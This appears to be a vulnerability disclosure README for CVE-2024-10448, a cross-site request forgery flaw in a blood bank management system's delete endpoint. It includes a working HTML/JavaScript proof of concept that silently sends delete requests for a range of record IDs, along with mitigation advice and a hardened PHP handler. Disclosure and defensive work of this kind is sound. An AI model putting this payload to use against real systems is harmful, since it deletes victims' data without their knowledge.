
CVE-2024-10448 PoC — code-projects Blood Bank Management System delete.php cross-site request forgery

Associated Vulnerability
Title: code-projects Blood Bank Management System delete.php cross-site request forgery (CVE-2024-10448)
Description: A vulnerability, which was classified as problematic, has been found in code-projects Blood Bank Management System 1.0. Affected by this issue is some unknown functionality of the file /file/delete.php. The manipulation of the argument bid leads to cross-site request forgery. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. Other endpoints might be affected as well.
Description: Blood bank CSRF Attack POC
Readme

## **Affected Version:**
- **BloodBank Management System**: 1.0

## **Vulnerability Information:**
- **Vulnerability Type:** Cross Site Request Forgery (CSRF)
- **Severity:** HIGH
- **Status:** Unpatched

## **Vulnerable Endpoint:**
- **Path:** `/file/delete.php?bid=`

## **Vulnerability Description:**
A **Cross Site Request Forgery (CSRF)** vulnerability was discovered in the **blood request functionality** of the BloodBank Management System. The flaw occurs because a plain GET request to `/file/delete.php?bid=` deletes whichever record the `bid` parameter selects, with no check that the logged-in user intentionally sent the request. The `bid` values, however, are dynamic, depending on when blood samples were added, so to make the request succeed I used a JavaScript-generated image tag within a loop.

Successful exploitation can lead to **unauthorized actions, i.e. deletion of data**, performed on behalf of the victim. The attack is triggered simply by the victim visiting a malicious website that carries the payload while logged in to the application.

---

## **Proof of Concept (PoC):**

Below is an example of a **CSRF PoC** that deletes the available blood samples via the `bid` parameter. Host the file on an attacker-controlled domain; in my case I was using `localhost`:

```html
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>CSRF PoC</title>
</head>
<body>
    <h2>CSRF Proof of Concept for Deleting Blood Bank Records</h2>
    <script>
        // Define the target URL where the Blood Bank System is hosted
        const targetUrl = "http://localhost/bloodbank/file/delete.php";

        // Loop through possible bid values (0 to 20); the upper bound can be raised as needed
        for (let bid = 0; bid <= 20; bid++) {
            // Create an image element for each bid value; loading its src sends the GET request
            // with the victim's session cookie attached
            let img = document.createElement("img");
            img.src = `${targetUrl}?bid=${bid}`;
            img.style.display = "none";  // Hide the image from view
            document.body.appendChild(img);
        }
    </script>
</body>
</html>
```

---


## Video POC

- ![video link](./bloodbank-delete-csrf.mp4)

## **Impact:**
- **Data Manipulation:** Attackers could delete records, altering the content displayed to users.
- **Reputational Damage:** Users may lose trust in the system due to malicious behavior.

---

## **Mitigation Recommendations:**
1. **Use CSRF Tokens:** Implement a mechanism that rejects cross-domain requests, or include a `csrf token` in every state-changing request and verify it server-side. Also stop performing state-changing actions (such as deletion) in response to `GET` requests.
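A hardened server-side handler that applies both recommendations, written here as an added example rather than taken from the project: it refuses anything but POST (so the PoC's `<img>` GET requests fail), checks a per-session CSRF token with a constant-time compare, and validates `bid` before use. The table name, database credentials and redirect target are assumptions.

```php
<?php
// Hardened replacement for /file/delete.php (added example, not the project's code).
// Assumes the application already keeps the logged-in user in the session and that
// the delete form embeds csrf_token() as a hidden field named "csrf_token":
//   <input type="hidden" name="csrf_token" value="<?= htmlspecialchars(csrf_token()) ?>">
session_start();

// Return the token bound to this session, generating it on first use.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Constant-time comparison so the token cannot be guessed byte by byte.
function csrf_check(string $submitted): bool
{
    return isset($_SESSION['csrf_token'])
        && hash_equals($_SESSION['csrf_token'], $submitted);
}

// 1. State-changing actions only via POST: an <img src> can only issue GET.
if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
    http_response_code(405);
    header('Allow: POST');
    exit('Method Not Allowed');
}

// 2. Defence in depth: modern browsers send Sec-Fetch-Site; a cross-site
//    origin is rejected even before the token is inspected.
$fetchSite = $_SERVER['HTTP_SEC_FETCH_SITE'] ?? 'same-origin';
if (!in_array($fetchSite, ['same-origin', 'none'], true) || !csrf_check($_POST['csrf_token'] ?? '')) {
    http_response_code(403);
    exit('Request rejected: missing or invalid CSRF token');
}

// 3. The record id must be a positive integer; anything else is a 400.
$bid = filter_input(INPUT_POST, 'bid', FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
if ($bid === null || $bid === false) {
    http_response_code(400);
    exit('Invalid bid');
}

// 4. Delete through a prepared statement (DSN, credentials and table name are placeholders).
$pdo = new PDO('mysql:host=localhost;dbname=bloodbank', 'DB_USER', 'DB_PASSWORD');
$stmt = $pdo->prepare('DELETE FROM blood_samples WHERE bid = ?');
$stmt->execute([$bid]);
header('Location: ../index.php');  // assumed post-delete landing page
```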

---
File Snapshot

[4.0K] /data/pocs/2aaee88d1db8c1aabbed9382cb0450c267426784
├── [5.3M] bloodbank-delete-csrf.mp4
├── [ 734] poc.html
└── [2.4K] README.md

0 directories, 3 files